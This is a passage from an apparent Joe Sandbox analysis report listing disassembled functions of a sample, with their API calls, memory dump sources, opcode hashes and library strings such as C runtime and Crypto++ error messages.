                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Variant$ClearCopyException@8InitThrow
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3826472263-0
                                                                                                                                                                                                                                              • Opcode ID: ac8edbb1181704e49b4952b6f7d0480fc639dc34ce07908080135180333bd28f
                                                                                                                                                                                                                                              • Instruction ID: 75330e055027aad5ebf0122fb5ec1aaed52e09f19d08ecccba4e345af4c88aec
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ac8edbb1181704e49b4952b6f7d0480fc639dc34ce07908080135180333bd28f
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 98112972D05668AFCB11CF98C8C4ADFBB78EB55618F61826AE924A3700C7745D0587E0
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF08D80 Relevance: 6.1, APIs: 4, Instructions: 54COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • _malloc.LIBCMT ref: 6CF08D8A
                                                                                                                                                                                                                                                • Part of subcall function 6CF39D66: __FF_MSGBANNER.LIBCMT ref: 6CF39D7F
                                                                                                                                                                                                                                                • Part of subcall function 6CF39D66: __NMSG_WRITE.LIBCMT ref: 6CF39D86
                                                                                                                                                                                                                                                • Part of subcall function 6CF39D66: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,00000000,?,6CF39BD4,6CED1290,FF0C5935), ref: 6CF39DAB
                                                                                                                                                                                                                                                • Part of subcall function 6CF391F6: std::_Lockit::_Lockit.LIBCPMT ref: 6CF39202
                                                                                                                                                                                                                                              • _malloc.LIBCMT ref: 6CF08DAF
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CF08DD4
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF08DEB
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _malloc$AllocateException@8HeapLockitLockit::_Throwstd::_std::exception::exception
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3043633502-0
                                                                                                                                                                                                                                              • Opcode ID: 5dca8ee44edbb023eb4a83a541d3a7e52fff21e587019989ec9b0b9c83b99e0e
                                                                                                                                                                                                                                              • Instruction ID: 8b239a03083e4ea4913846b31558635dfaf6e0c66d6b7233d1257e18d0a5e3e1
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5dca8ee44edbb023eb4a83a541d3a7e52fff21e587019989ec9b0b9c83b99e0e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: C8F0F67290522277D201FB569C52BDF37A89F91A14F800A1DF95891A01EF21D31CC1F3
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF40A60 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                                              • API String ID: 3016257755-0
                                                                                                                                                                                                                                              • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                              • Instruction ID: 5dc0a0160894d82246c4263ef7db3e4cca8db4c73020c5a6d2c8050f36b9c8de
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 17114E3304118ABBCF165E84DC51CEE3F32BB29358B598515FE2859932C776C5B1AB81
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF38970 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 175COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _memmove_memset
                                                                                                                                                                                                                                              • String ID: EncodingParameters
                                                                                                                                                                                                                                              • API String ID: 3555123492-55378216
                                                                                                                                                                                                                                              • Opcode ID: 2ac0f3ecd704ce754e4a846fd108b58e56926d561ed529e437920b38960a5b18
                                                                                                                                                                                                                                              • Instruction ID: 5fd6828975c4744b502d4b13fc398c585e5d578a310433bd55a221a95a611e28
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 2ac0f3ecd704ce754e4a846fd108b58e56926d561ed529e437920b38960a5b18
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 666112B4208341AFC344CF69C880A1AFBE9AFC9754F108A1EF59987391D770E945CBA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CEDF190 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CED4760: __CxxThrowException@8.LIBCMT ref: 6CED47F9
                                                                                                                                                                                                                                                • Part of subcall function 6CF08D80: _malloc.LIBCMT ref: 6CF08D8A
                                                                                                                                                                                                                                                • Part of subcall function 6CF08D80: _malloc.LIBCMT ref: 6CF08DAF
                                                                                                                                                                                                                                              • _memcpy_s.LIBCMT ref: 6CEDF282
                                                                                                                                                                                                                                              • _memset.LIBCMT ref: 6CEDF293
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: _malloc$Exception@8Throw_memcpy_s_memset
                                                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                                                              • API String ID: 3081897325-2766056989
                                                                                                                                                                                                                                              • Opcode ID: 217a982bae56b32938e78b88bd065fdc3fac9e55d7902f9d54cfcb4973d0d24e
                                                                                                                                                                                                                                              • Instruction ID: 471081e5a73f2cbaeeff07b84e3148ea3c27b332b1d5be11e0f32215f468982e
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 217a982bae56b32938e78b88bd065fdc3fac9e55d7902f9d54cfcb4973d0d24e
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E851BE71D00248EFDB10CFA4C881BDEBBB4BF55308F208199D8496B781DB756A09CFA2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CED4100 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • std::_Xinvalid_argument.LIBCPMT ref: 6CED4175
                                                                                                                                                                                                                                              • _memmove.LIBCMT ref: 6CED41C6
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: std::_Xinvalid_argument.LIBCPMT ref: 6CED402A
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_$_memmove
                                                                                                                                                                                                                                              • String ID: string too long
                                                                                                                                                                                                                                              • API String ID: 2168136238-2556327735
                                                                                                                                                                                                                                              • Opcode ID: 5d88a8a81b6f925a274397a3fcfd4dc1a39e68ae21656fcbb6c5f5f423d57b99
                                                                                                                                                                                                                                              • Instruction ID: 075d2ca4ebc795ce2e3d722b81a9f7ad572f2855a79a5a7eaf631809c59928d2
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d88a8a81b6f925a274397a3fcfd4dc1a39e68ae21656fcbb6c5f5f423d57b99
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C31C4333116105BD7208F5CAC80A5AF7F9EBB6764B310A2FE491C7F80C761AC4697A2
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF0C350 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 104COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF0C39B
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Exception@8Throw
                                                                                                                                                                                                                                              • String ID: gfff$gfff
                                                                                                                                                                                                                                              • API String ID: 2005118841-3084402119
                                                                                                                                                                                                                                              • Opcode ID: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
                                                                                                                                                                                                                                              • Instruction ID: f06cab3ce3e07e173bf164e99299df7845223dafeabffc612013b404a264aad3
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0fc975951894ecdd0a9fd187ee17f5a7dd85dbf523fbdf3c3300f41ba2466e2d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F8316F71A0020DAFDB14CF98DD90EEEB7B9EB84718F04851CE81997684D730BA09DBA1
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CED18C0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 98COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: std::_Xinvalid_argument.LIBCPMT ref: 6CED402A
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CED194F
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CED198E
                                                                                                                                                                                                                                                • Part of subcall function 6CF395C1: std::exception::operator=.LIBCMT ref: 6CF395DA
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: std::_Xinvalid_argument.LIBCPMT ref: 6CED4067
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: _memmove.LIBCMT ref: 6CED40C8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • Clone() is not implemented yet., xrefs: 6CED18ED
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: Xinvalid_argumentstd::_$ExceptionException@8RaiseThrow_memmovestd::exception::exceptionstd::exception::operator=
                                                                                                                                                                                                                                              • String ID: Clone() is not implemented yet.
                                                                                                                                                                                                                                              • API String ID: 2192554526-226299721
                                                                                                                                                                                                                                              • Opcode ID: 04bdab8aa7477d31b9e907e011c5d777947c52ee5e59685b7eec38d10574d36d
                                                                                                                                                                                                                                              • Instruction ID: 12845b62e582082c07de6a590a92ef6cf8cfad16af17c3b192d3a0da20f2d5ab
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 04bdab8aa7477d31b9e907e011c5d777947c52ee5e59685b7eec38d10574d36d
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F4317071C04258BFCB10CF98D840BEEFBB8EB15314F50462EE525A7B90DB75A608CB90
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CF05560 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: std::_Xinvalid_argument.LIBCPMT ref: 6CED402A
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CF05657
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • InputBuffer, xrefs: 6CF055BF
                                                                                                                                                                                                                                              • StringStore: missing InputBuffer argument, xrefs: 6CF055E0
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_6ced0000_YyIDUCFWC1.jbxd
                                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                                              • API ID: ExceptionException@8RaiseThrowXinvalid_argumentstd::_
                                                                                                                                                                                                                                              • String ID: InputBuffer$StringStore: missing InputBuffer argument
                                                                                                                                                                                                                                              • API String ID: 3718517217-2380213735
                                                                                                                                                                                                                                              • Opcode ID: b3e162717322c67d854721b96b919f51828a1c605d3bedd37747303f4f1b8f62
                                                                                                                                                                                                                                              • Instruction ID: a40a8caa94e565c87da1ac99a91b64d9fe16aa81dae0eebf0e2ac55476294466
                                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b3e162717322c67d854721b96b919f51828a1c605d3bedd37747303f4f1b8f62
                                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0F415AB15083809FD320CF19C490A9BFBF0BB99714F508A1EF1E983790DB759908CB52
                                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                                              Function 6CED1EA0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 94COMMON
                                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: std::_Xinvalid_argument.LIBCPMT ref: 6CED402A
                                                                                                                                                                                                                                              • __CxxThrowException@8.LIBCMT ref: 6CED1F36
                                                                                                                                                                                                                                                • Part of subcall function 6CF3AC75: RaiseException.KERNEL32(?,?,6CF39C34,FF0C5935,?,?,?,?,6CF39C34,FF0C5935,6CF69C90,6CF7B974,FF0C5935), ref: 6CF3ACB7
                                                                                                                                                                                                                                              • std::exception::exception.LIBCMT ref: 6CED1F6E
                                                                                                                                                                                                                                                • Part of subcall function 6CF395C1: std::exception::operator=.LIBCMT ref: 6CF395DA
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: std::_Xinvalid_argument.LIBCPMT ref: 6CED4067
                                                                                                                                                                                                                                                • Part of subcall function 6CED4010: _memmove.LIBCMT ref: 6CED40C8
                                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                                              • CryptoMaterial: this object does not support precomputation, xrefs: 6CED1ED4
                                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                                              • Source File: 00000000.00000002.1710179705.000000006CED1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CED0000, based on PE: true
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710158591.000000006CED0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710476616.000000006CF54000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710554390.000000006CF6E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710576794.000000006CF70000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710597310.000000006CF71000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710618270.000000006CF73000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7A000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710647361.000000006CF7C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              • Associated: 00000000.00000002.1710687200.000000006CF7E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
